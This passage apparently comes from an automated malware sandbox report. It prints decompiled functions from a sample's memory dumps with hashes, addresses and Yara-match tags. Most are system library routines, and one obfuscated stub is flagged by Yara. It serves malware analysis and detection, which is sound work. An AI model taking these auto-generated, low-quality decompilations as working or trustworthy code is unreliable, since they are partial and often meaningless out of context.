				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4c2d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04B57D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                    0x04c08d34
                                                                                                                                    0x04c08d43
                                                                                                                                    0x04c08d4b
                                                                                                                                    0x04c08d4e
                                                                                                                                    0x04c08d52
                                                                                                                                    0x04c08d5c
                                                                                                                                    0x04c08d6e
                                                                                                                                    0x04c08d5e
                                                                                                                                    0x04c08d67
                                                                                                                                    0x04c08d67
                                                                                                                                    0x04c08d79
                                                                                                                                    0x04c08d7a
                                                                                                                                    0x04c08d7c
                                                                                                                                    0x04c08d81
                                                                                                                                    0x04c08d94

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ed6104269488c0027f641e7dc8d4d56348e0b93c65a68c4222b5d0bdf677dbd1
                                                                                                                                    • Instruction ID: 909c6c65e04b7fc06eb1cf0d9735ca5c99378116c9ad5a9ce932ab4047d7b596
                                                                                                                                    • Opcode Fuzzy Hash: ed6104269488c0027f641e7dc8d4d56348e0b93c65a68c4222b5d0bdf677dbd1
                                                                                                                                    • Instruction Fuzzy Hash: 4CF0B470E047089FDB14EFB8D541B6EB7B4EF14304F108099E915EB390EA34EA00CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C08CD6, Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                    			E04C08CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4c2d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04B57D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                    0x04c08ce5
                                                                                                                                    0x04c08ced
                                                                                                                                    0x04c08cf0
                                                                                                                                    0x04c08cfb
                                                                                                                                    0x04c08d0d
                                                                                                                                    0x04c08cfd
                                                                                                                                    0x04c08d06
                                                                                                                                    0x04c08d06
                                                                                                                                    0x04c08d18
                                                                                                                                    0x04c08d19
                                                                                                                                    0x04c08d1b
                                                                                                                                    0x04c08d20
                                                                                                                                    0x04c08d33

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 27546f0f4e6721398bc3ef52c245a674c3bc3fe0c7f7172a02cc542f67f6c9a0
                                                                                                                                    • Instruction ID: a2f4f5140e280b16c7017c0d53c1552bc2715a9b680d19dfbc0d62c391fa224d
                                                                                                                                    • Opcode Fuzzy Hash: 27546f0f4e6721398bc3ef52c245a674c3bc3fe0c7f7172a02cc542f67f6c9a0
                                                                                                                                    • Instruction Fuzzy Hash: E6F08270A05609AFDB04EBA9D946E6EB7B4EF18304F144199F916EB2D0EA34E900CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B5746D, Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E04B5746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04B4EB70(__ecx, 0x4c279a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04B795D0();
							L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                                                    0x04b5746d
                                                                                                                                    0x04b5746d
                                                                                                                                    0x04b5746d
                                                                                                                                    0x04b57471
                                                                                                                                    0x04b57488
                                                                                                                                    0x04b9f92d
                                                                                                                                    0x04b5748e
                                                                                                                                    0x04b57491
                                                                                                                                    0x04b57495
                                                                                                                                    0x04b9f937
                                                                                                                                    0x04b9f93a
                                                                                                                                    0x04b9f94e
                                                                                                                                    0x04b9f953
                                                                                                                                    0x04b9f956
                                                                                                                                    0x04b9f956
                                                                                                                                    0x04b57495
                                                                                                                                    0x00000000
                                                                                                                                    0x04b57488
                                                                                                                                    0x04b57473
                                                                                                                                    0x04b57478
                                                                                                                                    0x04b5747d
                                                                                                                                    0x04b57481
                                                                                                                                    0x00000000
                                                                                                                                    0x04b57481
                                                                                                                                    0x04b5747d
                                                                                                                                    0x04b5747a
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5ad6b60b69f3b27f8d321d70e9c34d6563007313a5a3a13b37e159800487daeb
                                                                                                                                    • Instruction ID: 4f8628771af1db845e1c3ec950ed3e4a607d1f000553aec03bcd920c65449a48
                                                                                                                                    • Opcode Fuzzy Hash: 5ad6b60b69f3b27f8d321d70e9c34d6563007313a5a3a13b37e159800487daeb
                                                                                                                                    • Instruction Fuzzy Hash: 2AF0B434700244AADF019B6CC480B79FFB1AF04314F0401E5DC51A7170FBA4F8029785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04C08B58, Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 36%
                                                                                                                                    			E04C08B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4c2d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04B57D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                    0x04c08b67
                                                                                                                                    0x04c08b6f
                                                                                                                                    0x04c08b72
                                                                                                                                    0x04c08b7d
                                                                                                                                    0x04c08b8f
                                                                                                                                    0x04c08b7f
                                                                                                                                    0x04c08b88
                                                                                                                                    0x04c08b88
                                                                                                                                    0x04c08b9a
                                                                                                                                    0x04c08b9b
                                                                                                                                    0x04c08b9d
                                                                                                                                    0x04c08ba2
                                                                                                                                    0x04c08bb5

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 418ea2dc6a3f668cb178bc8ab270e324f4ce2aa736571bcd641f1ca2ae2391e0
                                                                                                                                    • Instruction ID: a2f3845dd4fd9806e8838145c641243c7440f0abdd5fb12fbbdfc85404693f7f
                                                                                                                                    • Opcode Fuzzy Hash: 418ea2dc6a3f668cb178bc8ab270e324f4ce2aa736571bcd641f1ca2ae2391e0
                                                                                                                                    • Instruction Fuzzy Hash: 68F082B0A14258AFEB14EBA8D906E7EB3B4EF04304F544499BA15DB3D0EA74E900C798
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B34F2E, Relevance: .0, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B34F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04C088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04B5C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b11030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                                                    0x04b34f2e
                                                                                                                                    0x04b34f34
                                                                                                                                    0x04b34f38
                                                                                                                                    0x04b90b85
                                                                                                                                    0x04b90b85
                                                                                                                                    0x04b90b89
                                                                                                                                    0x04b90b9a
                                                                                                                                    0x04b90b9a
                                                                                                                                    0x04b90b9f
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90b9f
                                                                                                                                    0x04b90b94
                                                                                                                                    0x04b90b98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b90b98
                                                                                                                                    0x04b34f3e
                                                                                                                                    0x04b34f48
                                                                                                                                    0x00000000
                                                                                                                                    0x04b34f6e
                                                                                                                                    0x00000000
                                                                                                                                    0x04b34f70

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ba979dd92e0663b5ffe24ffd715478cda5fe0cf8269d60407892e8d200f8f2f6
                                                                                                                                    • Instruction ID: 9e6f54f05b2925c07918d88810befa06cf962649eb6ca701344ac87ab393ec69
                                                                                                                                    • Opcode Fuzzy Hash: ba979dd92e0663b5ffe24ffd715478cda5fe0cf8269d60407892e8d200f8f2f6
                                                                                                                                    • Instruction Fuzzy Hash: 65F0E2369296948FEB71EB28C144B22B7E4EB087B8F4444F4D805C7921C724FC40C640
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00800CE4, Relevance: .0, Instructions: 25COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9d41a6cc97f2c89d4285e9fe8b2f6f0e7df3c9e642e8b00a7cb878e8a6f5e67
                                                                                                                                    • Instruction ID: 6f1ce797c560684e198c1e1ea42f634d09a62f2f607da552826d1c426674a569
                                                                                                                                    • Opcode Fuzzy Hash: c9d41a6cc97f2c89d4285e9fe8b2f6f0e7df3c9e642e8b00a7cb878e8a6f5e67
                                                                                                                                    • Instruction Fuzzy Hash: D7E09237208515EFCA60CB5DDC40A4AF3F0FF41374B254625E845E3690DB20FC118E60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B6A185, Relevance: .0, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B6A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4c267e4 >= 0xa) {
					if(_t5 < 0x4c26800 || _t5 >= 0x4c26900) {
						return L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04B50010(0x4c267e0, _t5);
				}
			}





                                                                                                                                    0x04b6a190
                                                                                                                                    0x04b6a1a6
                                                                                                                                    0x04b6a1c2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b6a192
                                                                                                                                    0x04b6a192
                                                                                                                                    0x04b6a19f
                                                                                                                                    0x04b6a19f

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 46ce3180c58109e0dc6b6bd4d50a98ca4b5bd7760ba4e697720a9dddfec806ec
                                                                                                                                    • Instruction ID: 3b181c0d75a68baf55c28c81110974e9a69e77800247525ca30255cfd6e5fed3
                                                                                                                                    • Opcode Fuzzy Hash: 46ce3180c58109e0dc6b6bd4d50a98ca4b5bd7760ba4e697720a9dddfec806ec
                                                                                                                                    • Instruction Fuzzy Hash: 56D05BB136109056FA2D6710BF54B252213E7CAB18F304CDDF2476A5A0DDD8FCE49568
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B616E0, Relevance: .0, Instructions: 17COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B616E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04B61710(0x4c267e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04B54620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                                                    0x04b616e8
                                                                                                                                    0x04b616ef
                                                                                                                                    0x04b616f3
                                                                                                                                    0x04b616fe
                                                                                                                                    0x00000000
                                                                                                                                    0x04b61700
                                                                                                                                    0x04b6170d
                                                                                                                                    0x04b6170d
                                                                                                                                    0x04b616f2
                                                                                                                                    0x04b616f2
                                                                                                                                    0x04b616f2
                                                                                                                                    0x04b616f2

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 431c6efdddb67c1620b38ee580394aba9fe33579c39dbab00349f8f929cf2974
                                                                                                                                    • Instruction ID: b4d2dd7c98faaaef79f9ba7b2513b1dc0cd8aaeadbca2d8cb14b155c89c2532f
                                                                                                                                    • Opcode Fuzzy Hash: 431c6efdddb67c1620b38ee580394aba9fe33579c39dbab00349f8f929cf2974
                                                                                                                                    • Instruction Fuzzy Hash: C0D0A7B120014056FA2D5B189804B142253DB80B89F3800DCF50B594D0CFB8FCA2E458
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004157F1, Relevance: .0, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                    			E004157F1(void* __eax, void* __ebx, char __ecx, void* __esi) {

				asm("scasb");
				asm("xlatb");
				 *0x2d1b6854 = __ecx;
				asm("rcl ch, cl");
				return __ecx;
			}



                                                                                                                                    0x004157f8
                                                                                                                                    0x004157f9
                                                                                                                                    0x004157fa
                                                                                                                                    0x004157ff
                                                                                                                                    0x0041580f

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0f44ffb6b3c4785cf752015bce0a2dd15ba18f6fe23c7e6ef0f005b78cd23e9a
                                                                                                                                    • Instruction ID: ea814151ba78623553b3c0aa25773eb0eca900a63401a227e25bd0cb7dd35700
                                                                                                                                    • Opcode Fuzzy Hash: 0f44ffb6b3c4785cf752015bce0a2dd15ba18f6fe23c7e6ef0f005b78cd23e9a
                                                                                                                                    • Instruction Fuzzy Hash: 0FC0123364A199458316095474511A5FBB99483199B043167D08CE7756C105900C475D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00804E70, Relevance: .0, Instructions: 13COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2caad8255fb23cc3955d602d05669dd6e2127c7a8315c6feeded86a67014011c
                                                                                                                                    • Instruction ID: 6531a03ea41a92fd1f9ba6746e082905afca611c0f95b9f0464467497764fd2f
                                                                                                                                    • Opcode Fuzzy Hash: 2caad8255fb23cc3955d602d05669dd6e2127c7a8315c6feeded86a67014011c
                                                                                                                                    • Instruction Fuzzy Hash: FDD06778A01208EFCB00DF98D65579CBBF4EB49604F1041A9D848A7741D6756E159B81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B635A1, Relevance: .0, Instructions: 12COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B635A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04B4EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                                                    0x04b635a1
                                                                                                                                    0x04b635a1
                                                                                                                                    0x04b635a5
                                                                                                                                    0x04b635ab
                                                                                                                                    0x04b635ab
                                                                                                                                    0x04b635b5
                                                                                                                                    0x00000000
                                                                                                                                    0x04b635c1
                                                                                                                                    0x04b635b7

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                    • Instruction ID: 66bf0feb1092f887e27cd4ded1b3212de0f702e05211f026b59f045ceea8281e
                                                                                                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                    • Instruction Fuzzy Hash: FBD0C9315515859AEB51AB50C27876877F3FB40318F5830E5D84717952C33EAA5AEE01
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B3AD30, Relevance: .0, Instructions: 10COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B3AD30(intOrPtr _a4) {

				return L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                                    0x04b3ad49

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                    • Instruction ID: 1dae02361e02ba508f472ee272231a3793ef943fa9aa7d88934017f7f37a8564
                                                                                                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                    • Instruction Fuzzy Hash: 32C08C32180288BBC7126A45DD00F01BF29E790B60F000020BA040A6718932E860D588
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B636CC, Relevance: .0, Instructions: 10COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B636CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04B54620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                                    0x04b636d2
                                                                                                                                    0x04b636e8
                                                                                                                                    0x04b636d4
                                                                                                                                    0x04b636e5
                                                                                                                                    0x04b636e5

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                    • Instruction ID: 2e46d3e22d1db1627874663d6bad71c0d81f93143b1c5f004eac73938bf1bacb
                                                                                                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                    • Instruction Fuzzy Hash: 49C09B7515D440FBE7155F30CD51F15B294F740A65F6407D4B722495F0D57DBC40D504
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B57D50, Relevance: .0, Instructions: 7COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B57D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                    0x04b57d56
                                                                                                                                    0x04b57d5b
                                                                                                                                    0x04b57d60
                                                                                                                                    0x04b57d5d
                                                                                                                                    0x04b57d5d
                                                                                                                                    0x04b57d5d

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                    • Instruction ID: 3f009d56989628b51883979a398a657934b39cd6b479cffd47d60c2cd7ae52d8
                                                                                                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                    • Instruction Fuzzy Hash: 42B092343019408FCF26DF18C080B1573E4FB44A40F8400D0E800CBA20D629E8009900
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B798A0, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 256774f47258beeb3ec02b271ce685b2ddd0cb2371292c93375c676a6464bd66
                                                                                                                                    • Instruction ID: 75766178834cc93cf955f20984e77541dee88d4f715d33f9f8de38e9fb05b313
                                                                                                                                    • Opcode Fuzzy Hash: 256774f47258beeb3ec02b271ce685b2ddd0cb2371292c93375c676a6464bd66
                                                                                                                                    • Instruction Fuzzy Hash: EC90026230100402F10271598414A06000DD7E1389F91C05BE1415559D8665D963F572
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B798F0, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6aa322d74e06ad1a966d38116624d4db439aca37e333f7c2af2b70b414d94788
                                                                                                                                    • Instruction ID: 1366e81f94fe03f827afdf77e282ce07b5f2f6dfcc3c69cfe9bda097cc29de50
                                                                                                                                    • Opcode Fuzzy Hash: 6aa322d74e06ad1a966d38116624d4db439aca37e333f7c2af2b70b414d94788
                                                                                                                                    • Instruction Fuzzy Hash: F290026260100502F10171598404A16000ED7E0285F91C06BE1015559ECA65D9A2F571
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79820, Relevance: .0, Instructions: 4COMMON
                                                                                                                                    Download Yara Rule
